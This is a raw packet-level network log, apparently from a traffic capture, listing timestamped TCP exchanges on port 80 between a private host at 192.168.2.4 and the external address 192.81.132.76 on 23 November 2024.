Nov 23, 2024 12:47:16.360172033 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.363430023 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.363559961 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.363611937 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.367010117 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.367152929 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.367232084 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.370691061 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.370879889 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.370935917 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.374195099 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.374325037 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.374382019 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.377856970 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.377983093 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.378035069 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.381573915 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.381649971 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.381712914 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.385072947 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.385162115 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.385219097 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.388641119 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.388750076 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.388813019 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.392247915 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.392349005 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.392406940 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.395848036 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.395948887 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.396019936 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.399415016 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.400188923 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.400248051 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.403101921 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.403167963 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.403228045 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.406625986 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.406748056 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.406814098 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.410175085 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.410307884 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.410372019 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.414134979 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.414263010 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.414319992 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.417100906 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.417211056 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.417262077 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.420439005 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.420497894 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.420552969 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.423799992 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.424058914 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.424128056 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.426919937 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.461559057 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.461621046 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.461668015 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.463141918 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.463200092 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.463238001 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.466216087 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.466270924 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.466386080 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.469326019 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.469387054 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.469410896 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.472440958 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.472510099 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.472707987 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.475563049 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.475614071 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.475665092 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.478631020 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.478683949 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.478841066 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.481690884 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.481750965 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.481810093 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.484870911 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.484946012 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.485076904 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.487910032 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.487966061 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.488034964 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.491334915 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.491391897 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.491436958 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.499589920 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.499650002 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.499667883 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.500463963 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.500503063 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.500519037 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.502424002 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.502460003 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.502476931 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.505141973 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.505197048 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.505351067 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.507364988 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.507421970 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.507452965 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.509519100 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.509573936 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.509629011 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.511976004 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.512033939 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.512064934 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.514902115 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.514936924 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.514954090 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.515538931 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.515578985 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.515620947 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.516499996 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.516554117 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.516607046 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.517838001 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.517903090 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.517925024 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.519170046 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.519222975 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.519268036 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.520520926 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.520580053 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.520610094 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.521842003 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.521907091 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.521938086 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.523225069 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.523261070 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.523277044 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.524523020 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.524642944 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.524650097 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.525861025 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.525917053 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.525968075 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.527206898 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.527256966 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.527343035 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.528589010 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.528640032 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.528640985 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.529911041 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.529963017 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.530038118 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.531202078 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.531251907 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.531335115 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.532514095 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.532574892 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.532639027 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.533838034 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.533888102 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.533963919 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.535146952 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.535197973 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.535274982 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.536468029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.536518097 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.536544085 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.537781000 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.537837982 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.537889957 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.539098024 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.539155960 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.539174080 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.540395021 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.540460110 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.540493011 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.541707993 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.541781902 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.541830063 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.543006897 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.543060064 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.543095112 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.544287920 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.544358015 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.544368029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.545705080 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.545758963 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.545813084 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.546863079 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.546928883 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.546952009 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.548173904 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.548232079 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.548263073 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.549421072 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.549473047 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.549525023 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.550685883 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.550724030 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.550751925 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.551963091 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.552018881 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.552058935 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.553262949 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.553322077 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.553337097 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.554548979 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.554622889 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.554634094 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.555754900 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.555823088 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.674484968 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.674711943 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.674777031 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.675091982 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.675226927 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.675282001 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.676414967 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.676568985 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.676631927 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.677355051 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.677455902 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.677506924 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.678087950 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.678158045 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.678216934 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.678611040 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.678663015 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.678738117 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.679291010 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.679446936 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.679497957 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.680174112 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.680227995 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.680278063 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.680677891 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.680809975 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.680859089 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.681404114 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.681457996 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.681524992 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.681845903 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.681900978 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.681953907 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.682634115 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.682769060 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.682817936 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.683626890 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.683828115 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.683895111 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.684649944 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.684777975 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.684832096 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.685667038 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.685739994 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.685798883 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.686660051 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.686763048 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.686819077 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.687642097 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.687766075 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.687823057 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.688633919 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.688771009 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.688827991 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.689626932 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.689733028 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.689790964 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.690629005 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.690742970 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.690810919 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.691615105 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.691746950 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.691804886 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.692605972 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.692747116 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.692805052 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.693619967 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.693738937 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.693820000 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.694622993 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.694768906 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.694825888 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.695594072 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.695715904 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.695774078 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.696609974 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.696744919 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.696803093 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.697653055 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.697813988 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.697890043 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.698649883 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.698818922 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.698901892 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.699599028 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.699712992 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.699768066 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.700614929 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.700731039 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.700787067 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.701632977 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.701706886 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.701760054 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.702666044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.702702999 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.702754974 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.703628063 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.703816891 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.703866005 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.704611063 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.704705000 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.704768896 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.705775023 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.705811977 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.705869913 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.706592083 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.706744909 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.706840992 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.707674026 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.707803965 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.707859039 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.708822966 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.708859921 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.708914995 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.709609032 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.709707022 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.709759951 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.710619926 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.710731983 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.710794926 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.711612940 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.711721897 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.711774111 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.712610006 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.712723970 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.712786913 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.713613033 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.713718891 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.713773012 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.714629889 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.714721918 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.714776039 CET	49734	80	192.168.2.4	192.81.132.76
